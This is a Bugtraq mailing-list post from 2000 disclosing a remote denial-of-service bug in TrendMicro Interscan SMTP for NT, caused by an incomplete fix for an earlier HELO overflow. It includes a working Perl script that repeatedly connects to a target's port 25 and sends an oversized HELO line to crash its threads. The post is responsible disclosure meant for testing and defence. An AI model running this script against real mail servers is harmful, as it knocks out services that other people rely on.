Bugtraq mailing list archives

New DOS on Interscan NT/3.32

From: Alain.Thivillon () HSC FR (Alain Thivillon)
Date: Mon, 17 Apr 2000 16:30:03 +0200


One month ago, during a audit, we found a new remote DOS on TrendMicro
Interscan for NT (last version V3.32, build 1011 and 1022).

Last October, USSR Labs found a buffer overflow in HELO command, and
wrote a very nice exploit with shell code, giving SYSTEM shell access to
remote attacker. Trendmicro closed the hole, unfortunatly the patch
was not complete : by sending a HELO followed by exactly 4075 to 4090
characters, SMTP tasks crashes immediatly. Depending of your current
installed NT Debugger, this crash can stop all other SMTP Threads (if
DRWatson is called) or just reduce number of remaining incoming threads
(default value is 25).

We send our problem to TrendMicro, their reaction was very nice and they
send us a new fixed version 3 days after, however i don't know if this
version as been released to public.

Below is a perl script you can use to test your vulnerabilty, Nessus
version scheduled for today will include a NASL script.

--
Alain Thivillon -+- Alain.Thivillon () hsc fr -+- Hervé Schauer Consultants

#!/usr/bin/perl

# (c) Alain Thivillon & Stephane Aubert
#     Herve Schauer Consultants 2000
#     http://www.hsc.fr/
#
#     Do not use this stuff against Microsoft MX hosts :)
#
# Crash Interscan SMTP Server on Windows NT Version 3.32 Builds 1011 and 1022
# Depending of debugger installed on NT, crash can be immediat if you use
# Drwatson.32.exe (new connections get stuck), or can be limited to single
# thread if Auto=0 in NT Debug key. Interscan limits number of running
# threads (default 25) so it' very easy to exhaust all threads and finally
# force answer to '452 Too Busy'

use Socket;
use FileHandle;

$vict=$ARGV[0];

$AF_INET = 2;
$SOCK_STREAM = 1;
$port=25;
$sockaddr = 'S n a4 x8';

($name, $aliases, $type, $len, $thataddr) = gethostbyname($vict);
$that = pack($sockaddr, $AF_INET, $port, $thataddr);

while (1) {
  $mysock=new FileHandle;
  socket($mysock, $AF_INET, $SOCK_STREAM, $proto) || die "socket failed\n";
  connect($mysock, $that) || die "Connect failed\n";
  select($mysock); $| = 1; select(STDOUT); $| = 1;

  $line = <$mysock>;
  print $line;
  print $mysock "HELO ",'a'x4075,"\r\n";
  $line = <$mysock>;
  print $line;
  close $mysock;
}

Current thread:

Back Door in Commercial Shopping Cart Joe (Apr 11)
- Performance Copilot for IRIX 6.5 Marcelo Magnasco (Apr 12)
- Microsoft Security Bulletin (MS00-024) Microsoft Product Security (Apr 12)
- Re: Back Door in Commercial Shopping Cart Luciano Ramos (Apr 13)
  - [TL-Security-Announce] PAM and usermode TLSA2000009-1 Katie Moussouris (Apr 14)
  - Re: Back Door in Commercial Shopping Cart Luciano Ramos (Apr 14)
    - Re: Back Door in Commercial Shopping Cart [Stormer Hosting] Dan Kaminsky (Apr 14)
    - New DOS on Interscan NT/3.32 Alain Thivillon (Apr 17)
    - Re: Back Door in Commercial Shopping Cart [RESOLVED] Dan Kaminsky (Apr 17)
- Re: Back Door in Commercial Shopping Cart Pete Holsberg (Apr 13)
- Re: Back Door in Commercial Shopping Cart Anik (Apr 13)
- more problems with that POS dansie cart software! tombow (Apr 14)
  - Re: more problems with that POS dansie cart software! Randy Janinda (Apr 14)
  - nmh-1.0.4 released Dan Harkless (Apr 14)
  - xfs Michal Zalewski (Apr 16)
  - StarOffice 5.1 Michal Zalewski (Apr 16)
  - XFree86 server overflow Michal Zalewski (Apr 16)
    - XFree86 server overflow - exploit issues Michal Zalewski (Apr 16)

(Thread continues...)